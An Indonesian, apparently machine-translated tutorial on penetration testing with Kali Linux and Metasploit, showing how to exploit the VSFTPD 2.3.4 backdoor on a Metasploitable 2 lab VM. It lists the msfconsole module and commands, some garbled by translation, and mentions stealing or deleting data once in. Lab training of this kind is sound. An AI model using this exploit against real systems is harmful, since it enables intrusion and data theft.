metasploit

Metasploit di Kali Linux 2020

Metasploit di Kali Linux 2020

Pengujian penetrasi dengan Kali Linux


Internet penuh dengan pengintai dengan niat jahat yang ingin mengakses jaringan dan mengeksploitasi data mereka sambil menghindari deteksi. Masuk akal untuk memastikan keamanan jaringan dengan mengukur kerentanannya. Pengujian penetrasi atau peretasan etis adalah cara kami menguji jaringan atau server untuk target yang dapat ditentukan dengan menunjukkan dengan tepat semua kemungkinan pelanggaran yang mungkin digunakan peretas untuk mendapatkan akses, sehingga mengurangi kompromi keamanan. Pengujian penetrasi sering dilakukan melalui aplikasi perangkat lunak, yang paling populer adalah Kali Linux, lebih disukai dengan kerangka Metasploit. Tetap bertahan sampai akhir untuk mempelajari cara menguji sistem dengan mengeksekusi serangan dengan Kali Linux.

Pengantar kerangka Kali Linux dan Metasploit

Kali Linux adalah salah satu dari banyak alat keamanan sistem canggih yang dikembangkan (dan diperbarui secara berkala) oleh Keamanan Serangan. Ini adalah sistem operasi berbasis Linux yang dilengkapi dengan seperangkat alat yang terutama dirancang untuk pengujian penetrasi. Ini cukup mudah digunakan (setidaknya jika dibandingkan dengan program pengujian pena lainnya) dan cukup rumit untuk memberikan hasil yang memadai.

Itu Kerangka Metasploit adalah platform pengujian penetrasi modular open-source yang digunakan untuk menyerang sistem untuk menguji eksploitasi keamanan. Ini adalah salah satu alat pengujian penetrasi yang paling umum digunakan dan sudah terpasang di Kali Linux.

Metasploit terdiri dari datastore dan modul. Datastore memungkinkan pengguna untuk mengonfigurasi aspek-aspek dalam kerangka kerja, sedangkan modul adalah potongan kode mandiri dari mana Metasploit mendapatkan fitur-fiturnya. Karena kami berfokus pada mengeksekusi serangan untuk pengujian pena, kami akan melanjutkan diskusi ke modul.

Secara total, ada lima modul:

Mengeksploitasi - menghindari deteksi, membobol sistem dan mengunggah modul muatan
Muatan - Memungkinkan akses pengguna ke sistem
Bantu -mendukung pelanggaran dengan melakukan tugas yang tidak terkait dengan eksploitasi
Pos-Eksploitasi - memungkinkan akses lebih lanjut ke sistem yang sudah dikompromikan
TIDAK generator - digunakan untuk mem-bypass IP keamanan

Untuk tujuan kami, kami akan menggunakan modul Exploit dan payload untuk mendapatkan akses ke sistem target kami.

Menyiapkan lab pengujian pena Anda

Kami membutuhkan perangkat lunak berikut:

KaliLinux:

Kali Linux akan dioperasikan dari perangkat keras lokal kami. Kami akan menggunakan kerangka Metasploit untuk menemukan eksploitasi.

Sebuah hypervisor:

Kami akan membutuhkan hypervisor karena memungkinkan kami untuk membuat mesin virtual, yang memungkinkan kita untuk bekerja pada lebih dari satu sistem operasi secara bersamaan. Ini adalah prasyarat penting untuk pengujian penetrasi. Untuk kelancaran dan hasil yang lebih baik, kami sarankan untuk menggunakan keduanya kotak virtual atau Microsoft Hyper-V untuk membuat mesin virtual aktif.

Metasploitable 2

Jangan bingung dengan Metasploit, yang merupakan kerangka kerja di Kali Linux, metasploitable adalah mesin virtual yang sengaja diprogram untuk melatih para profesional keamanan siber. Metasploitable 2 memiliki banyak sekali kerentanan yang dapat diuji yang dapat kami eksploitasi, dan ada cukup banyak informasi yang tersedia di web untuk membantu kami memulai.

Meskipun menyerang sistem virtual di Metasploitable 2 mudah karena kerentanannya didokumentasikan dengan baik, Anda akan membutuhkan lebih banyak keahlian dan kesabaran dengan mesin dan jaringan nyata yang pada akhirnya akan Anda lakukan uji penetrasi untuk. Tetapi menggunakan metasploitable 2 untuk pengujian pena berfungsi sebagai titik awal yang sangat baik untuk mempelajari metode ini.

Kami akan menggunakan metasploitable 2 untuk melanjutkan pengujian pena kami. Anda tidak memerlukan banyak memori komputer untuk mesin virtual ini untuk bekerja, ruang hard disk 10 GB dan ram 512mbs akan baik-baik saja. Pastikan untuk mengubah pengaturan jaringan untuk Metasploitable ke adaptor khusus host saat Anda menginstalnya. Setelah terinstal, mulai Metasploitable dan masuk. Startup Kali Linux sehingga kita bisa mendapatkan kerangka kerja Metasploitnya untuk memulai pengujian kita.

Memanfaatkan VSFTPD v2.3.4 Eksekusi Perintah Pintu Belakang

Dengan semua hal di tempatnya, kita akhirnya bisa mencari kerentanan untuk dieksploitasi. Anda dapat mencari web untuk kerentanan yang berbeda, tetapi untuk tutorial ini, kita akan melihat bagaimana VSFTPD v2.3.4 dapat dimanfaatkan. VSFTPD adalah singkatan dari daemon FTP yang sangat aman. Kami telah memilih yang ini karena memberi kami akses penuh ke antarmuka Metasploitable tanpa meminta izin.

Mulai Konsol Metasploit. Buka command prompt di Kali Linux dan masukkan kode berikut:

$ sudo msfconsole

Dengan konsol sekarang terbuka, ketik:

$ pencarian vsftpd

Ini menampilkan lokasi kerentanan yang ingin kita eksploitasi. Untuk memilihnya, ketik

$ gunakan exploit/unix/ftp/vsftpd_234_backdoor

Untuk melihat informasi lebih lanjut apa yang diperlukan untuk mem-boot eksploitasi, ketik

$ tampilkan opsi

Satu-satunya informasi yang sangat penting yang hilang adalah IP, yang akan kami berikan.

Cari alamat IP di metasploitable dengan mengetik

$ ifconfig

Di shell perintahnya

Alamat IP ada di awal baris kedua, seperti

#  alamat inet:10.0.2.15

Ketik perintah ini untuk mengarahkan Metasploit ke sistem target, dan mulai mengeksploitasi. Saya menggunakan ip saya, tetapi akan menghasilkan kesalahan, namun jika Anda menggunakan IP korban yang berbeda, Anda akan mendapatkan hasil dari exploit

$ set RHOST [IP korban]

$ lari

Sekarang, dengan akses penuh yang diberikan ke Metasploitable, kita dapat menavigasi melalui sistem tanpa batasan apa pun. Anda dapat mengunduh data rahasia apa pun atau menghapus sesuatu yang penting dari server. Dalam situasi nyata, di mana blackhat mendapatkan akses ke server seperti itu, mereka bahkan dapat mematikan CPU, menyebabkan komputer lain yang terhubung dengannya juga mogok.

Membungkus sesuatu

Lebih baik menghilangkan masalah terlebih dahulu daripada bereaksi terhadapnya. Pengujian penetrasi dapat menghemat banyak kerumitan dan mengejar ketertinggalan dalam hal keamanan sistem Anda, baik itu satu mesin komputer atau seluruh jaringan. Dengan pemikiran ini, akan sangat membantu untuk memiliki pengetahuan dasar tentang pengujian pena pen. Metasploitable adalah alat yang sangat baik untuk mempelajari esensinya, karena kerentanannya sudah diketahui dengan baik, jadi ada banyak informasi tentangnya. Kami hanya mengerjakan satu exploit dengan Kali Linux, tetapi kami sangat menyarankan Anda untuk melihat lebih jauh ke dalamnya.

5 Produk Mouse Komputer Ergonomis Terbaik untuk Linux
Apakah penggunaan komputer yang lama menyebabkan rasa sakit di pergelangan tangan atau jari Anda?? Apakah Anda menderita persendian yang kaku dan teru...
Cara Mengubah Pengaturan Mouse dan Touchpad Menggunakan Xinput di Linux
Sebagian besar distribusi Linux dikirimkan dengan pustaka "libinput" secara default untuk menangani kejadian input pada sistem. Ini dapat memproses ke...
Petakan ulang tombol mouse Anda secara berbeda untuk perangkat lunak yang berbeda dengan Kontrol Tombol X-Mouse
Mungkin Anda membutuhkan alat yang dapat membuat kontrol mouse Anda berubah dengan setiap aplikasi yang Anda gunakan. Jika demikian, Anda dapat mencob...